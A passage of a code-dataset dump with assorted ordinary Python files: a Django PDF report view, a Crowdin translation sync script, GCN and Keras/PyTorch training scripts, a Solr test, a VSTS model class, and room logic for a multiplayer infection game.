lid_render = []\n    val = []\n    boo_first = True\n    pdf_data = None\n\n    for pdf in list_pdf:\n        rendered = pdf.render()  # render each chunk only once\n        if boo_first:\n            boo_first = False\n            pdf_data = rendered\n        lid_render.append(rendered)\n\n    for doc in lid_render:\n        for p in doc.pages:\n            val.append(p)\n\n    pdf_file = pdf_data.copy(val).write_pdf()  # use metadata of the first rendered document\n\n    http_response = HttpResponse(pdf_file, content_type='application/pdf')\n    http_response['Content-Disposition'] = 'attachment; filename=\"replacement_order_report.pdf\"'\n\n    return http_response\n","sub_path":"NAAN/report/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"575452968","text":"# -*- coding: utf-8 -*-\n\nimport io\nimport os\nimport zipfile\n\nimport requests\nfrom git import Repo\n\nimport secrets\n\n\nlanguage_transition = {\n 'cs': 'cs',\n 'de': 'de',\n # 'en': 'en',\n 'es-ES': 'es',\n 'fr': 'fr',\n 'hu': 'hu',\n 'it': 'it',\n 'ko': 'ko',\n 'pl': 'pl',\n 'pt-BR': 'pt',\n 'ru': 'ru',\n 'sk': 'sk',\n 'tr': 'tr',\n 'uk': 'uk',\n 'zh-CN': 'zh',\n}\n\n\nclass Crowdin(object):\n\n _supported_languages = None\n _translation_status = None\n\n def __init__(self, project_identifier, project_key):\n self.project_identifier = project_identifier\n self.project_key = project_key\n\n @classmethod\n def supported_languages(cls):\n if cls._supported_languages is None:\n cls._supported_languages = {\n language['crowdin_code']: language\n for language in requests.get(\n 'https://api.crowdin.com/api/supported-languages?json=mycallback'\n ).json()\n }\n return cls._supported_languages\n\n def translation_status(self):\n if self._translation_status is None:\n self._translation_status = {\n language['code']: language\n for language in requests.post(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/status?key={project_key}&json=mycallback'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n )\n ).json()\n }\n return self._translation_status\n\n def export(self):\n return requests.get(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/export?key={project_key}&json=mycallback'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n )\n ).json()\n\n def download(self, lang):\n response = requests.get(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/download/{lang}.zip?key={project_key}'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n lang=lang,\n ),\n stream=True,\n )\n return zipfile.ZipFile(io.BytesIO(response.content))\n\n\nif __name__ == '__main__':\n c = Crowdin(secrets.PROJECT_IDENTIFIER, secrets.PROJECT_KEY)\n\n repo = Repo(os.path.join(os.path.dirname(__file__), 'tutorial'))\n c.export()\n for code in language_transition:\n repo.heads.master.checkout()\n repo.create_head('crowdin-translation-{}'.format(\n language_transition[code]\n ))\n repo.heads['crowdin-translation-{}'.format(\n language_transition[code]\n )].checkout()\n\n with c.download(code) as zip_f:\n for src_name in zip_f.namelist():\n dst_name = os.path.join(\n 'tutorial',\n language_transition[code],\n *os.path.normpath(src_name).split(os.sep)[2:]\n )\n\n if src_name.endswith('/'):\n if not os.path.exists(dst_name):\n os.makedirs(dst_name)\n continue\n\n with open(dst_name, 'bw+') as dst_f:\n dst_f.write(zip_f.read(src_name))\n repo.index.add([os.path.join(\n language_transition[code],\n *os.path.normpath(src_name).split(os.sep)[2:]\n )])\n repo.index.commit('crowdin-translation-{}'.format(\n language_transition[code]\n ))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353594035","text":"import json\n\nfrom src.errors import Container\nfrom src.handler import error\n\n\ndef test_getter(question_number, test_number, test_set, code):\n if question_number not in test_set:\n raise Container(error(\n f\"Question {question_number} not found in homework\", code))\n if test_number not in test_set[question_number]:\n raise Container(\n error(\n f\"Test {test_number} not found in Question {question_number}\",\n code))\n return test_set[question_number][test_number]\n\n\ndef load_tests_path(tests_path, test_data, test_expected):\n with open(tests_path, \"r\") as f:\n data = json.load(f)\n\n test_data.update(data[\"input\"])\n test_expected.update(data[\"expected\"])\n\n\ndef extract_argument(data, arg_name):\n try:\n return data[arg_name]\n except KeyError:\n raise Container(error(f\"Missing argument `{arg_name}`\", \"missing_arg\"))\n","sub_path":"autocorrect-server/src/homeworks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"120352656","text":"import os\nimport sys\nimport shutil\nimport random\nimport time\nimport pandas as pd\nimport networkx as nx\n#sys.path.append('/home/social-sim/Documents/SocialSimCodeTesting/gcn/preprocess_DARPA_data/process_data/')\nfrom under_test_prepare_matrices import get_ordered_features_and_adjM_matrices\nfrom under_test_prepare_matrices import get_features_adjM_data\n\ndb = 'twitter_cve'\nbase = '/home/social-sim/Documents/SocialSimCodeTesting/GCN/sgc'\npath1 = 'preprocess_DARPA_data/process_data'\npath2 = 'pytorch/SGC-master/data'\n\n\ndef one_complete_run(kibana_matrix,A,subject,feat_cols, predictors, pr_col,k,epo,b_inx, top, network_file):\n\n\tprint('Changing directory to prepare new data...')\n\tos.chdir(base +'/'+ path1)\n\t#execfile('prepare_matrices.py')\n\n\tprint('Removing old data ...')\n\tfeat_matrix = '%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db)\n\tadj_matrix = '%s/%s/npz_data/%s/reddit.npz'%(base,path1,db)\n\tif os.path.exists(feat_matrix):\n\t\tos.remove(feat_matrix)\n\tif os.path.exists(adj_matrix):\n\t\tos.remove(adj_matrix)\n\n\tprint('Executing prepare matrix codes ...')\n\t#os.system('python3 %s/%s/prepare_matrices.py %s\t%s\t%s'%(base,path1,pr_col,kibana_matrix,A))\n\tget_features_adjM_data(kibana_matrix,A,subject,feat_cols, pr_col)\n\n\tprint('Renaming new data...')\n\tos.rename('%s/%s/npz_data/%s/%s.npz'%(base,path1,db,db),'%s/%s/npz_data/%s/reddit.npz'%(base,path1,db))\n\tos.rename('%s/%s/npz_data/%s/%s_adj.npz'%(base,path1,db,db),'%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db))\n\n\n\tprint('Changing directory to SGC...')\n\tos.chdir(base + '/'+ path2)\n\n\tprint('Removing old data ...')\n\tfeat_matrix = 'reddit_adj.npz'\n\tadj_matrix = 'reddit.npz'\n\tif os.path.exists(feat_matrix):\n\t\tos.remove(feat_matrix)\n\tif os.path.exists(adj_matrix):\n\t\tos.remove(adj_matrix)\n\n\tprint('Moving new data...')\n\tshutil.move('%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db), '%s/%s/'%(base,path2))\n\tshutil.move('%s/%s/npz_data/%s/reddit.npz'%(base,path1,db), '%s/%s/'%(base,path2))\n\n\n\tprint('Changing directory to SGC...')\n\tos.chdir(base + '/'+ 'pytorch/SGC-master/')\n\n\tprint('Executing SGC reddit.py ...')\n\t#if pr_col != 'polarity':\n\tos.system('python3 reddit.py --pr_col %s --degree %s --subject %s --predictor %s --epochs %s --binx %s --top %s --netfile %s' %(pr_col,k,subject, predictors, epo,b_inx, top, network_file))\n\t#else:\n\t#os.system('python3 reddit.py --pr_col polarity')\n\n\ndef main():\n\tdb = 'twitter_cve'\n\tdir_ = '/home/social-sim/Documents/SocialSimCodeTesting/GCN/sgc/preprocess_DARPA_data/'\n\ttop_hashtags_file = dir_ + 'process_data/predicted_hashtags/%s/top_hashtags/50_largest_hashtags.csv'%db\n\t#top_hashtags = pd.read_csv(top_hashtags_file, sep=',',header = None,names=['hashtags','count'])['hashtags'].values[0:10]\n\tstart_time = time.time()\n\tn_iteration = 2\n\tbins_set = [[-1,0,1]]#,[-1,-0.5,0,0.5,1]]#,[-1,-0.75,-0.5,-0.25,0,0.25,0.5,0.75,1]]\n\tpr_col , subject, predictors= 'polarity_category', 'polarity_w_hashtags','topics'#'extension.subjectivity', 'subjectivity','hashtags'# ,'topics' # 'hashtags'# #'possibly_sensitive','sensitivity','hashtags' # 'topics' #'possibly_sensitive','sensitivity', 'topics' #'hashtags'#, # 'extension.polarity' #'possibly_sensitive_True','sensitivity' , 'topics'#\n\n\n\t#network_dir = dir_ + 'raw_data/twitter_cve/whole_network/'\n\tnetwork_dir = dir_ + 'raw_data/twitter_cve/communities/' #@@@@@ uncomment this for communities\n\n\tfls = [ f for f in os.listdir(network_dir) if os.path.isfile(os.path.join(network_dir,f))]\n\tfor network_file in sorted(fls, reverse=True)[2:]:\n\t\tfor top in [600,20, 30,40,50,200, 100,400]:#[10,20,30,40]:\n\t\t\tfor b_inx, bins in enumerate(bins_set):\n\t\t\t\tkibana_matrix,A,feat_cols, pr_cols = get_ordered_features_and_adjM_matrices(bins, pr_col , subject, predictors, top, 'communities/%s'%network_file) #@@@@@ uncomment this for communities\n\t\t\t\t#kibana_matrix,A,feat_cols, pr_cols = get_ordered_features_and_adjM_matrices(bins, pr_col , subject, predictors, top, network_file)\n\n\t\t\t\tif len(kibana_matrix)==0:\n\t\t\t\t\tcontinue\n\t\t\t\t'''\n\t\t\t\t############# predicting top k hashtags over degree (k)\n\t\t\t\tpr_col_log = base + '/'+ path1 + '/k_predicted _top_hashtags.csv'\n\t\t\t\tif os.path.exists(pr_col_log):\n\t\t\t\t\tos.remove(pr_col_log)\n\t\t\t\tresults_log = base + '/'+ path2 + '/k_top_hashtag_results.csv'\n\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\tos.remove(results_log)\n\t\t\t\tprint('getting feature matrix and adj matrix...')\n\t\t\t\tfor h in top_hashtags:\n\t\t\t\t\tfor k in [2,4,6, 8,10]:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tone_complete_run(kibana_matrix,A,'test',h,k,200,b_inx)\n\n\t\t\t\t'''\n\t\t\t\t'''\n\t\t\t\t############# predicting random hashtags\n\t\t\t\tfor s in [1,50,100,150,200,250,300,350,400,450,500,550]:\n\t\t\t\t\tstart = s\n\t\t\t\t\tend = start + 5\n\t\t\t\t\tcol_list = [i for i in range(start,end)]\n\t\t\t\t\tpr_col_log = base + '/'+ path1 + '/predicted hashtags.csv'\n\t\t\t\t\tif os.path.exists(pr_col_log):\n\t\t\t\t\t\tos.remove(pr_col_log)\n\t\t\t\t\tresults_log = base + '/'+ path2 + '/hashtag_results.csv'\n\t\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\t\tos.remove(results_log)\n\t\t\t\t\tfor c in col_list:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tone_complete_run(c)\n\n\t\t\t\t\tprint('Renaming results file...')\n\t\t\t\t\tos.rename('%s/%s/hashtag_results.csv'%(base,path2),'%s/%s/hashtag_results_%s_%s.csv'%(base,path2,start,end))\n\t\t\t\t\tos.rename('%s/%s/predicted hashtags.csv'%(base,path1),'%s/%s/predicted hashtags_%s_%s.csv'%(base,path1,start,end))\n\t\t\t\t'''\n\n\t\t\t\t############# predicting polarity\n\n\t\t\t\tresults_log = base + '/'+ path2 + '/%s_results.csv'%subject\n\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\tos.remove(results_log)\n\t\t\t\tfor epo in [50000]:\n\t\t\t\t\tfor k in [0,1,2,3,4,6,8]:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tprint('File: ',network_file, '\\n Subject: ', subject, '\\n Predictors:', predictors,'\\n Epoc:', epo, '\\n Degree k:',k, '\\n Iteration: ',i )\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tone_complete_run(kibana_matrix,A,subject, feat_cols, predictors, pr_cols,k,epo,b_inx, top, network_file)\n\t\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\t\tcontinue\n\t\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nmain()\n","sub_path":"sgc/preprocess_DARPA_data/process_data/files_under_test/under-test_auto_executing.py","file_name":"under-test_auto_executing.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"398985469","text":"from Data import Data\nfrom SolrCrud import SolrCrud\n\nq = SolrCrud()\n\n#insert test\ndata = Data(\"mkmid\",\"test test\",\"testtest test test\")\nq.add(data)\n\n#query test\nresults = q.query(\"*:*\")\nfor result in results:\n print(\"{0}-{1}\".format(result['id'], result['compName_s']))\n\n#delete test\nq.delete(\"mkmid\")","sub_path":"solr_crud/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"413705303","text":"import random\nimport os\nimport shutil\n\nimport onnxmltools  # needed for the ONNX export at the bottom of this script\nfrom model import cat_dog_classfiy_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom tqdm import tqdm\nfrom elasticsearch import Elasticsearch\nfrom escallback import ElasticCallback\n\nes_notifier = ElasticCallback()\nes_notifier.configure(\n    job_name=\"cat_dog_classfiy_model\",\n    es_client=Elasticsearch([\"elasticsearch.default\"]),\n)\n\n# prepare datasets\ndata_path = \"/datasets/\"\ndataset = os.listdir(data_path)\ntest_set = random.sample(dataset, int(len(dataset) * 0.2))\ntrain_set = set(dataset) - set(test_set)\n\n# move the data to higher-speed volumes; check whether these paths and files already exist before copying\npaths = [\n    \"/ssd/train_set/dog/\",\n    \"/ssd/train_set/cat/\",\n    \"/ssd/test_set/cat/\",\n    \"/ssd/test_set/dog/\",\n    \"/model/\",\n    \"/weights/\",\n]\n\n# save model to yaml file\nmodel_yaml = cat_dog_classfiy_model.to_yaml()\nwith open(\"/model/model.yaml\", \"w\") as yaml_file:\n    yaml_file.write(model_yaml)\n\nfor path in paths:\n    if not os.path.exists(path):\n        os.makedirs(path)\n\nwith tqdm(total=len(train_set), desc=\"copying train set\") as bar:\n    for train in train_set:\n        from_path = os.path.join(data_path, train)\n        if train.startswith(\"dog\"):\n            to_path = os.path.join(\"/ssd/train_set/dog/\", train)\n        elif train.startswith(\"cat\"):\n            to_path = os.path.join(\"/ssd/train_set/cat/\", train)\n        if not os.path.exists(to_path):\n            shutil.copy(from_path, to_path)\n        bar.update(1)\n\nwith tqdm(total=len(test_set), desc=\"copying test set\") as bar:\n    for test in test_set:\n        from_path = os.path.join(data_path, test)\n        if test.startswith(\"dog\"):\n            to_path = os.path.join(\"/ssd/test_set/dog/\", test)\n        elif test.startswith(\"cat\"):\n            to_path = os.path.join(\"/ssd/test_set/cat/\", test)\n        if not os.path.exists(to_path):\n            shutil.copy(from_path, to_path)\n        bar.update(1)\n\n\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255)\ntest_datagen = ImageDataGenerator(rescale=1.0 / 255)\ntraining_set = train_datagen.flow_from_directory(\n    \"/ssd/train_set/\", target_size=(64, 64), batch_size=32, class_mode=\"binary\"\n)\ntest_set = test_datagen.flow_from_directory(\n    \"/ssd/test_set\", target_size=(64, 64), batch_size=32, class_mode=\"binary\"\n)\n\n# feed dataset into model\ncat_dog_classfiy_model.fit_generator(\n    training_set,\n    steps_per_epoch=800,\n    epochs=1,  # last train, we found 12 epochs is enough\n    validation_data=test_set,\n    validation_steps=200,\n    callbacks=[es_notifier],\n)\n\n# serialize weights to HDF5\ncat_dog_classfiy_model.save_weights(\"/weights/weights.h5\")\n# convert model and weights to onnx model\nonnx_model = onnxmltools.convert_keras(cat_dog_classfiy_model)\nonnxmltools.utils.save_model(onnx_model, '/model/trained.onnx')","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"130242846","text":"import numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data_utils\nimport torch\n\nimport torchvision\nfrom torchvision import transforms\nfrom PIL import Image\nfrom IPython import display\nfrom sklearn.metrics import accuracy_score\nfrom tqdm import tqdm\n\n\nclasses = os.listdir(\"./notMNIST_train\")\nn_classes = len(classes)\nclasses = sorted(classes)\nIMG_H = 28\nIMG_W = 28\n\nbatch_size = 64\n\ntrain_data = torchvision.datasets.ImageFolder('./notMNIST_train/', transform=transforms.Compose([\n    transforms.Grayscale(num_output_channels=1),\n    transforms.ToTensor()]))\ntrain_loader = data_utils.DataLoader(train_data, batch_size=batch_size, shuffle=True)\n\nval_data = torchvision.datasets.ImageFolder('./notMNIST_val/', transform=transforms.Compose([\n    transforms.Grayscale(num_output_channels=1),\n    transforms.ToTensor()]))\nval_loader = data_utils.DataLoader(val_data, batch_size=1, shuffle=False)\n\nhid_size = 100\nout_size = n_classes\n\n\nclass TwoLayerNet(nn.Module):\n    def __init__(self, h, w, hid_size, out_size):\n        super(TwoLayerNet, self).__init__()\n        # declare the layers of our network\n        self.linear1 = nn.Linear(h * w, hid_size)\n        self.linear2 = nn.Linear(hid_size, out_size)\n\n    def forward(self, x):\n        x = self.linear1(x)\n        # activation function\n        x = F.relu(x)\n        x = self.linear2(x)\n        return x\n\n\ntwo_layer_net = TwoLayerNet(h=IMG_H, w=IMG_W, hid_size=hid_size, out_size=out_size)\nloss_fn = torch.nn.modules.loss.CrossEntropyLoss()\nlearning_rate = 1e-3\noptimizer = torch.optim.SGD(two_layer_net.parameters(), lr=learning_rate)\n\n\ndef train(train_loader, val_loader, num_epochs=100):\n    train_losses = []\n    val_losses = []\n\n    train_acc = []\n    val_acc = []\n\n    for epoch in range(num_epochs):\n        display.clear_output(wait=True)\n\n        # 1. forward\n        two_layer_net.train(True)\n        loss_batch = []\n        acc_batch = []\n        for x_train, y_train in train_loader:\n            x_train = Variable(x_train.view(x_train.shape[0], -1))\n            # 1.1 get the network predictions\n            y_pred = two_layer_net(x_train)\n            # 1.2 compute the accuracy on this batch from the predictions and the ground truth\n            acc_batch.append(accuracy_score(np.argmax(y_pred.data.cpu().numpy(), axis=1), y_train.numpy()))\n            # 1.3 compute the loss (cross-entropy)\n            loss_train = loss_fn(y_pred, Variable(y_train))\n            # 1.4 backward\n            loss_train.backward()\n            # 1.5 update the weights\n            optimizer.step()\n            # 1.6 zero the gradients\n            optimizer.zero_grad()\n            # 1.7 record the loss\n            loss_batch.append(loss_train.data.cpu().numpy())\n\n        train_losses.append(np.mean(loss_batch))\n        train_acc.append(np.mean(acc_batch))\n\n        # 2. val\n        two_layer_net.train(False)\n        loss_batch = []\n        acc_batch = []\n        for i, (x_val, y_val) in enumerate(val_loader):\n            x_val = Variable(x_val.view(x_val.shape[0], -1))\n            # 2.1 get the network predictions\n            y_pred = two_layer_net(x_val)\n            acc_batch.append(accuracy_score(np.argmax(y_pred.data.cpu().numpy(), axis=1), y_val.numpy()))\n            # 2.3 compute the loss (cross-entropy)\n            loss_val = loss_fn(y_pred, Variable(y_val))\n            # 2.4 record the loss\n            loss_batch.append(loss_val.data.cpu().numpy())\n\n        val_losses.append(np.mean(loss_batch))\n        val_acc.append(np.mean(acc_batch))\n\n        # 3. save the model to a file if the loss dropped after this epoch\n        torch.save(two_layer_net.state_dict(), 'Seminar_2_1.pt')\n\n        # 4. show plot\n        _, axes = plt.subplots(1, 2, figsize=(16, 6))\n\n        axes[0].set_title(\"losses\")\n        axes[0].plot(train_losses, label=\"train loss\")\n        axes[0].plot(val_losses, label=\"val loss\")\n        axes[0].legend()\n\n        axes[1].set_title(\"accuracies\")\n        axes[1].plot(train_acc, label=\"train accuracy\")\n        axes[1].plot(val_acc, label=\"val accuracy\")\n        axes[1].legend()\n\n        plt.show()\n\n    print(\"Final loss: \", val_losses[-1])\n    print(\"Final accuracy: \", val_acc[-1])\n\n\ntrain(train_loader, val_loader, num_epochs=20)","sub_path":"07. Neural Networks Practice/sem2_1.py","file_name":"sem2_1.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"315228772","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass BuildResourceUsage(Model):\n \"\"\"BuildResourceUsage.\n\n :param distributed_task_agents: The number of build agents.\n :type distributed_task_agents: int\n :param paid_private_agent_slots: The number of paid private agent slots.\n :type paid_private_agent_slots: int\n :param total_usage: The total usage.\n :type total_usage: int\n :param xaml_controllers: The number of XAML controllers.\n :type xaml_controllers: int\n \"\"\"\n\n _attribute_map = {\n 'distributed_task_agents': {'key': 'distributedTaskAgents', 'type': 'int'},\n 'paid_private_agent_slots': {'key': 'paidPrivateAgentSlots', 'type': 'int'},\n 'total_usage': {'key': 'totalUsage', 'type': 'int'},\n 'xaml_controllers': {'key': 'xamlControllers', 'type': 'int'}\n }\n\n def __init__(self, distributed_task_agents=None, paid_private_agent_slots=None, total_usage=None, xaml_controllers=None):\n super(BuildResourceUsage, self).__init__()\n self.distributed_task_agents = distributed_task_agents\n self.paid_private_agent_slots = paid_private_agent_slots\n self.total_usage = total_usage\n self.xaml_controllers = xaml_controllers\n","sub_path":"vsts/vsts/build/v4_1/models/build_resource_usage.py","file_name":"build_resource_usage.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"653857843","text":"import random\nfrom state import State\nfrom game_state import GameState\nfrom location import Location\n\nclass Room:\n    def __init__(self):\n        self.id = random.randrange(0, 10000)\n        self.users = []\n        self.game_state = GameState.NOT_STARTED\n        self.nbPlayersWhoMoved = []\n        self.nbPlayersWhoVoted = []\n        self.round = 0\n        self.selectioncheck = False\n        self.infected = 0\n        self.newcases = 0\n\n    ### ROOM LOGIC\n\n    def add_user(self, user):\n        for existing_user in self.users:\n            if user.name == existing_user.name:\n                raise NameError(\"User with name \" + user.name + \" already exists. Please pick a new name.\")\n\n        if len(self.users) == 0:\n            user.admin=True\n\n        self.users.append(user)\n        print(\"added user \" + user.name + \" to the room\")\n        return user\n\n    def add_users(self, users):\n        for user in users:\n            self.add_user(user)\n\n    def get_user(self, name):\n        for user in self.users:\n            if name == user.name:\n                return user\n        return None\n\n    def get_healthy_users(self):\n        return self.get_users_for_state(State.HEALTHY)\n\n    def get_infected_users(self):\n        return self.get_users_for_state(State.INFECTED)\n\n    def get_users_for_state(self, state):\n        if self.game_state == GameState.NOT_STARTED:\n            return None\n        else:\n            infected_users = []\n            for user in self.users:\n                if user.state == state:\n                    infected_users.append(user)\n            return infected_users\n\n    ### ROUND LOGIC\n\n    def start(self):\n        self.game_state = GameState.PLAYING\n        self.round = 1\n        self.infected = 1\n        self.newcases = 1\n        self.nbPlayersWhoMoved = []\n        self.nbPlayersWhoVoted = []\n        self.selectioncheck = False\n        self.reset_locations_and_votes()\n        for user in self.users:\n            user.heal()\n            user.quarantineVisits = 0\n            user.patient0 = False\n            user.stayhome = False\n\n        patient0 = random.choice(self.users)\n        patient0.patient0 = True\n        patient0.infect()\n\n    def next_round(self):\n        self.update_quarantine()\n        self.update_users_state()\n        self.heal_quarantined()\n        self.count_infected()\n        self.reset_round()\n        return self.update_game_status()\n\n    def reset_round(self):\n        self.round += 1\n        self.nbPlayersWhoMoved = []\n        self.nbPlayersWhoVoted = []\n        self.selectioncheck = False\n        self.reset_locations_and_votes()\n\n    def reset_locations_and_votes(self):\n        for user in self.users:\n            user.vote = None\n            user.location = Location.HOME\n\n\n    ### HANDLE USER INPUTS\n\n    def move_user_location(self, name, location):\n        user = self.get_user(name)\n        user.move_location(Location[location])\n        if user not in self.nbPlayersWhoMoved:\n            self.nbPlayersWhoMoved.append(user)\n        self.selection_check()\n        print(str(self.nbPlayersWhoMoved) + \"number of players who moved\")\n\n    def register_user_vote(self, name, vote):\n        user = self.get_user(name)\n        user.register_vote(self.get_user(vote))\n        if user not in self.nbPlayersWhoVoted:\n            self.nbPlayersWhoVoted.append(user)\n        self.selection_check()\n        print(str(self.nbPlayersWhoVoted) + \"number of players who voted\")\n\n    ### GAME LOGIC\n\n    def update_users_state(self):\n        for location, users_in_location in self.get_locations_dict(self.users).items():\n            if location == Location.HOME:\n                for user in users_in_location:\n                    user.stayhome = False\n            elif self.contains_infected(users_in_location):\n                for user in users_in_location:\n                    user.infect()\n                if location == Location.SUPERMARKET:\n                    for user in users_in_location:\n                        user.stayhome = True\n\n    def update_quarantine(self):\n        for nomination, users_who_voted in self.get_votes_dict(self.users).items():\n            if len(users_who_voted)/len(self.users) > 0.501:\n                nomination.quarantine()\n\n    def update_game_status(self):\n        if self.check_all_same_state(self.users, State.HEALTHY):\n            self.game_state = GameState.GOOD_GUYS_WON\n        elif self.check_all_same_state(self.users, State.INFECTED):\n            self.game_state = GameState.BAD_GUYS_WON\n        else:\n            self.game_state = GameState.PLAYING\n\n    def heal_quarantined(self):\n        for user in self.users:\n            if user.patient0 == True:\n                user.state = State.INFECTED\n                if user.quarantineVisits == 2:\n                    user.state = State.HEALTHY\n            elif user.state == State.QUARANTINED:\n                user.state = State.HEALTHY\n\n    def count_infected(self):\n        before = self.infected\n        count = 0\n        for user in self.users:\n            if user.state == State.INFECTED:\n                count += 1\n        self.infected = count\n        self.newcases = max(count - before, 0)\n\n    def selection_check(self):\n        if len(self.nbPlayersWhoMoved) == len(self.users) and len(self.nbPlayersWhoVoted) == len(self.users):\n            self.selectioncheck = True\n\n    @staticmethod\n    def check_all_same_state(users, state):\n        all_same = True\n        for user in users:\n            all_same = all_same and user.state == state\n        return all_same\n\n    @staticmethod\n    def get_locations_dict(users):\n        locations_dict = dict()\n        for user in users:\n            if user.state == State.QUARANTINED:\n                continue\n            if user.location in locations_dict:\n                locations_dict[user.location].append(user)\n            else:\n                locations_dict[user.location] = [user]\n        return locations_dict\n\n    @staticmethod\n    def get_votes_dict(users):\n        votes_dict = dict()\n        for user in users:\n            if user.vote in votes_dict:\n                votes_dict[user.vote].append(user)\n            else:\n                votes_dict[user.vote] = [user]\n        return votes_dict\n\n    @staticmethod\n    def contains_infected(users_in_location):\n        contains_infected = False\n        for user in users_in_location:\n            contains_infected = contains_infected or user.state == State.INFECTED\n        return contains_infected\n","sub_path":"beer-app/cls_room.py","file_name":"cls_room.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"634667276","text":"from catalyst import utils\nfrom catalyst.contrib.nn import ResidualBlock\nfrom torch import nn\nimport torchvision\n\n\nclass SequentialUnwrapper(nn.Module):\n def __init__(self, nn_module):\n super().__init__()\n self.nn_module = nn_module\n\n def forward(self, x):\n x_ = self.nn_module(x)\n return x, x_\n\n\ndef conv_block(in_channels, out_channels, pool=False):\n layers = [\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n ]\n if pool:\n layers.append(nn.MaxPool2d(2))\n return nn.Sequential(*layers)\n\n\ndef resnet9(in_channels: int, num_classes: int, size: int = 16):\n sz, sz2, sz4, sz8 = size, size * 2, size * 4, size * 8\n return nn.Sequential(\n conv_block(in_channels, sz),\n conv_block(sz, sz2, pool=True),\n ResidualBlock(nn.Sequential(conv_block(sz2, sz2), conv_block(sz2, sz2))),\n conv_block(sz2, sz4, pool=True),\n conv_block(sz4, sz8, pool=True),\n ResidualBlock(nn.Sequential(conv_block(sz8, sz8), conv_block(sz8, sz8))),\n nn.Sequential(\n nn.MaxPool2d(4),\n nn.Flatten(),\n nn.Dropout(0.2),\n SequentialUnwrapper(nn.Linear(sz8, num_classes)),\n ),\n )\n\n\nclass TemporalModel(nn.Module):\n def __init__(self, emb_features: int, out_features: int, dropout_p: float = 0.5):\n super().__init__()\n resnet = torchvision.models.resnet18(pretrained=True)\n in_features = resnet.fc.in_features\n resnet.fc = nn.Flatten()\n self.encoder = nn.Sequential(resnet, nn.Dropout(p=dropout_p))\n self.embedder = nn.Sequential(nn.Linear(in_features, emb_features), nn.ReLU())\n # self.attention = nn.Sequential(nn.Linear(in_features, 1), nn.Sigmoid())\n self.classifier = nn.Linear(emb_features, out_features)\n\n self.embedder.apply(utils.get_optimal_inner_init(nn.ReLU))\n self.classifier.apply(utils.outer_init)\n\n def forward(self, x):\n bs, ln, ch, h, w = x.shape\n x = self.encoder(x.view(-1, ch, h, w))\n embeddings = self.embedder(x.view(bs, ln, -1))\n # x_a = self.attention(x.view(bs, sl, -1))\n # x = x_r * x_a\n logits = self.classifier(embeddings).mean(1)\n return embeddings, logits\n","sub_path":"introspection/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
